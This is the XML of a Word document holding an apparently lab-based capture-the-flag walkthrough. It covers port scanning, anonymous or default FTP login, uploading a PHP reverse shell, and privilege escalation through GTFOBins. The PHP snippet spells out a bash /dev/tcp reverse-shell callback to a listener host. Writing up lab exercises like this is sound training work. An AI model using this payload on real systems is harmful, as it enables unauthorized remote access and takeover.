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61396" w14:textId="3B0125FD" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:r w:rsidRPr="009F1224">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="361B2730" wp14:editId="716B5309">
            <wp:extent cx="5400040" cy="2968625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="238795267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95267" name="Imagen 1" descr="Interfaz de usuario gráfic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8F91" w14:textId="77777777" w:rsidR="009F1224" w:rsidRPr="009F1224" w:rsidRDefault="009F1224" w:rsidP="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1224">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We start deploying the machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C7756" w14:textId="42DD9106" w:rsidR="009F1224" w:rsidRPr="009F1224" w:rsidRDefault="009F1224" w:rsidP="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1224">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37CCC920" wp14:editId="5BFAE2D9">
            <wp:extent cx="5400040" cy="982345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="395288292" name="Imagen 2" descr="Una captura de pantalla de un celular con texto e image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Una captura de pantalla de un celular con texto e imagen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AC08E" w14:textId="77777777" w:rsidR="009F1224" w:rsidRPr="009F1224" w:rsidRDefault="009F1224" w:rsidP="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1224">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After we deploy the machine, we proceed with a ping to check the connection, and the scan of open ports to check for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BA77D8" w14:textId="4D2E4217" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1224">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02AA3F61" wp14:editId="4B9D4331">
            <wp:extent cx="5400040" cy="3630930"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="10902297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2971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F6BF" w14:textId="67B71344" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We see that the open ports are 21 and 80, let’s check port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253F5676" w14:textId="4ED67D36" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1224">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158E61E1" wp14:editId="227E3DFE">
            <wp:extent cx="5400040" cy="2469515"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1104293689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93689" name="Imagen 1" descr="Interfaz de usuario gráfica, Sitio web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9365" w14:textId="2C620EDF" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We didn’t find anything there, let’s check the version of the ftp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07619AA4" w14:textId="027DD8B2" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F1224">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30EEDAFD" wp14:editId="6A829617">
            <wp:extent cx="4892040" cy="3343431"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="200872424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24243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1896" cy="335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51D4" w14:textId="3F948691" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all of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this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> links and the version of the ftp, let’s check if that version has any known </w:t>
      </w:r>
      <w:r w:rsidR="008E3E36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerabilities. It says to try to connect using common log users as admin, anonymous… Let’s try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C841C" w14:textId="5211F2FC" w:rsidR="008E3E36" w:rsidRDefault="008E3E36">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3E36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A3812B" wp14:editId="26D27E38">
            <wp:extent cx="3573780" cy="1411963"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="103407387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73870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4515" cy="142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B05F" w14:textId="77777777" w:rsidR="00AB2123" w:rsidRDefault="008E3E36">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">It works, now we will just upload a reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBD28F" w14:textId="6479BCDB" w:rsidR="00AB2123" w:rsidRPr="00AB2123" w:rsidRDefault="00AB2123" w:rsidP="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A209EC0" w14:textId="2D4F18BE" w:rsidR="00AB2123" w:rsidRPr="00AB2123" w:rsidRDefault="00AB2123" w:rsidP="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/bin/bash -c 'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/172.17.0.1/443 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277ABF5" w14:textId="30771BFE" w:rsidR="00AB2123" w:rsidRDefault="00AB2123" w:rsidP="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7312ED" w14:textId="6EB71482" w:rsidR="00AB2123" w:rsidRDefault="008E3E36">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>upload directory and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute it to get access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1A725" w14:textId="049A1C1F" w:rsidR="008E3E36" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27357827" wp14:editId="7DA6D0A2">
            <wp:extent cx="4629796" cy="1810003"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92127360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73605" name="Imagen 1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2B4D" w14:textId="3152C137" w:rsidR="00AB2123" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ECB187F" wp14:editId="203CEAAA">
            <wp:extent cx="5125165" cy="3248478"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="84330850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0850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E70F" w14:textId="48124FC4" w:rsidR="00AB2123" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Just start listening and click on the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B67CB3" w14:textId="1DD3C0B4" w:rsidR="00AB2123" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F946BBE" wp14:editId="2D8703E3">
            <wp:extent cx="5400040" cy="1377315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97891478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14787" name="Imagen 1" descr="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39EF" w14:textId="55ADC7AD" w:rsidR="00AB2123" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We’re in, now let’s set the terminal and escalate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451711EF" w14:textId="2DE5BE35" w:rsidR="00AB2123" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2123">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61BEBA17" wp14:editId="5A357679">
            <wp:extent cx="5400040" cy="1543685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63857285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72852" name="Imagen 1" descr="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0BB9" w14:textId="39527E8B" w:rsidR="00AB2123" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCD5E28" wp14:editId="2AC7F2C3">
            <wp:extent cx="2705478" cy="704948"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3068686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6860" name="Imagen 1" descr="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DDAF" w14:textId="4E9D1088" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A901DF9" wp14:editId="6B05F803">
            <wp:extent cx="5400040" cy="1542415"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="80622792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27921" name="Imagen 1" descr="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1714" w14:textId="432402B8" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use GTFO bins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8F74E" w14:textId="25F8A9F1" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F9C4C48" wp14:editId="4EAFECCD">
            <wp:extent cx="5400040" cy="1222375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="912662465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62465" name="Imagen 1" descr="Interfaz de usuario gráfica, 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4872" w14:textId="602BC1DB" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09B8D73D" wp14:editId="51A6988B">
            <wp:extent cx="5400040" cy="4102735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39666431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64313" name="Imagen 1" descr="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D68C" w14:textId="53E56BF5" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keep escalating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69863E" w14:textId="64C31306" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ABDC5E4" wp14:editId="595748CE">
            <wp:extent cx="4505954" cy="2038635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90002828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28284" name="Imagen 1" descr="Text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7A3E" w14:textId="0B959284" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Same, go to GTFO bins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399F7311" w14:textId="3D494158" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5C93ED" wp14:editId="1EBF49D7">
            <wp:extent cx="5400040" cy="1483995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="22616243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6243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3E93" w14:textId="7A8F95CD" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7172D46D" wp14:editId="790E463A">
            <wp:extent cx="2598420" cy="4981586"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="127553415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34157" name="Imagen 1" descr="Text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0028" cy="498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8074" w14:textId="748EF490" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we’re Gladys, let’s keep escalating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46FCF3" w14:textId="15C50A12" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4320234A" wp14:editId="53CBB89A">
            <wp:extent cx="4594860" cy="1559356"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="127533833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38334" name="Imagen 1" descr="Text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7877" cy="156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F1D2" w14:textId="2A7D2B3D" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GTFO bins again</w:t>
      </w:r>
      <w:r w:rsidR="005B4FA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B5017C" w14:textId="52044F2E" w:rsidR="00D90666" w:rsidRDefault="00D90666">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90666">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A5E869C" wp14:editId="09E7BAC8">
            <wp:extent cx="3332741" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1385083682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83682" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto, Aplicación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4068" cy="144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DDDC" w14:textId="5F09340F" w:rsidR="00D90666" w:rsidRDefault="000D65A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D65A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F1F12DD" wp14:editId="3AFEBB96">
            <wp:extent cx="5400040" cy="258445"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1590597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972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D712" w14:textId="5484CB5E" w:rsidR="000D65A6" w:rsidRDefault="000D65A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D65A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057AC146" wp14:editId="36DF8666">
            <wp:extent cx="5400040" cy="622935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="908011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119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6203" w14:textId="77777777" w:rsidR="00AB2123" w:rsidRDefault="00AB2123">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646E8082" w14:textId="77777777" w:rsidR="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CD780A" w14:textId="77777777" w:rsidR="009F1224" w:rsidRPr="009F1224" w:rsidRDefault="009F1224">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009F1224" w:rsidRPr="009F12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224"/>
    <w:rsid w:val="000D65A6"/>
    <w:rsid w:val="005B4FA5"/>
    <w:rsid w:val="0088313D"/>
    <w:rsid w:val="008E3E36"/>
    <w:rsid w:val="009F1224"/>
    <w:rsid w:val="00AB2123"/>
    <w:rsid w:val="00D9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9FC2A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B607F3BF-811C-4D9E-AE84-99CC4D123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1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1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1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1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1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1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1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1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1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1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1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1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12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12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12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12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12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12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1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1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1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1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1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12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12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12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1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12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1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141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Cuende Sanz, Alejandro</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cuende Sanz, Alejandro</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-06T17:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-06T18:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>